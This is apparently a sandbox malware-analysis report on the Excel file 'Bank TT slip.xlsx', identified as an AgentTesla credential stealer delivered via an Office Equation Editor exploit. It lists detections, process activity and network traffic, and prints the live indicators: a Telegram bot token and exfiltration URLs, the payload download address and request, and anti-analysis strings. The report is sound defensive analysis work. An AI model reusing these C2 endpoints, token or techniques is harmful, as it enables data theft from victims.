Windows Analysis Report
Bank TT slip.xlsx

Overview

General Information

Sample Name: Bank TT slip.xlsx
Analysis ID: 626166
MD5: 2391e6aa319cba9248661674ac5f2105
SHA1: bbdb700fd74488cc9f3f3e4d66de6b1321ee94b0
SHA256: 18fa3e8547f1b76b8a53b1169c4b3ed78f1a3efb77163e0698ae3b1faf7efb71

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Shellcode detected
Yara detected Generic Downloader
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: 5.0.RegSvcs.exe.400000.4.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1295185895", "Chat URL": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument"}
Source: vbc.exe.2404.4.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}
Source: Bank TT slip.xlsx Metadefender: Detection: 20%
Source: Bank TT slip.xlsx ReversingLabs: Detection: 31%
Source: http://172.245.27.27/SOA.exe Avira URL Cloud: Label: malware
Source: Http://172.245.27.27/SOA.exeK Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exeX Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exehhC: Avira URL Cloud: Label: malware
Source: Http://172.245.27.27/SOA.exej Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exeB Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe ReversingLabs: Detection: 46%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 46%
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe Joe Sandbox ML: detected
Source: 5.0.RegSvcs.exe.400000.4.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.1.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.2.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.3.unpack Avira: Label: TR/Spy.Gen8

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 172.245.27.27 Port: 80
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036805F7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680658 ShellExecuteExW,ExitProcess, 2_2_03680658
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680592 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03680592
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036804ED ExitProcess, 2_2_036804ED
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680676 ExitProcess, 2_2_03680676
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680641 ShellExecuteExW,ExitProcess, 2_2_03680641
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036805AC URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036805AC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680522 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03680522
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680506 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03680506
Source: global traffic DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 172.245.27.27:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 60MB

Networking

Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View IP Address: 172.245.27.27
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 14:58:18 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.28Last-Modified: Thu, 12 May 2022 04:27:00 GMTETag: "cb600-5dec8f8138359"Accept-Ranges: bytesContent-Length: 833024Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: GET /SOA.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.27.27Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036805F7
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Http://172.245.27.27/SOA.exeK
Source: EQNEDT32.EXE, 00000002.00000002.962678277.0000000003680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Http://172.245.27.27/SOA.exej
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: EQNEDT32.EXE, 00000002.00000002.962279454.0000000000320000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.27.27/SOA.exe
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.27.27/SOA.exeB
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.27.27/SOA.exeX
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.27.27/SOA.exehhC:
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bLHfhV.com
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocumentdocument-----
Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18D80E7.png
Source: unknown DNS traffic detected: queries for: api.telegram.org

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File written: C:\Windows\System32\drivers\etc\hosts

System Summary

Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: 5.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EB070 4_2_002EB070
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA8F8 4_2_002EA8F8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9910 4_2_002E9910
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EC970 4_2_002EC970
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EF14E 4_2_002EF14E
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EBA80 4_2_002EBA80
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5440 4_2_002E5440
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E8740 4_2_002E8740
Source: C:\Users\Public\vbc.exe Code function: 4_2_002ED808 4_2_002ED808
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EC959 4_2_002EC959
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EF222 4_2_002EF222
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9A04 4_2_002E9A04
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EEA69 4_2_002EEA69
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EEA78 4_2_002EEA78
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9AB3 4_2_002E9AB3
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9A98 4_2_002E9A98
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EE420 4_2_002EE420
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5430 4_2_002E5430
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EE410 4_2_002EE410
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EECA2 4_2_002EECA2
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EECB0 4_2_002EECB0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EEF4A 4_2_002EEF4A
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EEF58 4_2_002EEF58
Source: C:\Users\Public\vbc.exe Code function: 4_2_002ED7F9 4_2_002ED7F9
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C64DF 4_2_007C64DF
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C8DDD 4_2_007C8DDD
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C3EF0 4_2_007C3EF0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C43BF 4_2_007C43BF
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C0048 4_2_007C0048
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C3010 4_2_007C3010
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6D78 4_2_007C6D78
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C4D79 4_2_007C4D79
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6134 4_2_007C6134
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6D91 4_2_007C6D91
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C4D88 4_2_007C4D88
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6E1A 4_2_007C6E1A
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C3610 4_2_007C3610
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6B78 4_2_007C6B78
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6771 4_2_007C6771
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C7751 4_2_007C7751
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E178A 4_2_002E178A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_00286048 5_2_00286048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_00285430 5_2_00285430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_00282198 5_2_00282198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_00285778 5_2_00285778
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe 46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
Source: Joe Sandbox View Dropped File: C:\Users\Public\vbc.exe 46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 77740000 page execute and read and write
Source: Bank TT slip.xlsx Metadefender: Detection: 20%
Source: Bank TT slip.xlsx ReversingLabs: Detection: 31%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Bank TT slip.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR66EC.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.adwa.expl.evad.winXLSX@6/18@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\JHFJngVRuKk
Source: 5.0.RegSvcs.exe.400000.4.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegSvcs.exe.400000.1.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegSvcs.exe.400000.2.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EC132 push edx; ret 4_2_002EC139
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E8168 push ebx; ret 4_2_002E8169
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C702F push ss; iretd 4_2_007C704A
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C597F push eax; retf 0017h 4_2_007C5980
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C029C push esp; ret 4_2_007C029D
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C1359 pushfd ; iretd 4_2_007C135B
Source: initial sample Static PE information: section name: .text entropy: 7.02001355184
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036805F7

Boot Survival

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2648 Thread sleep time: -420000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 316 Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2428 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 9258
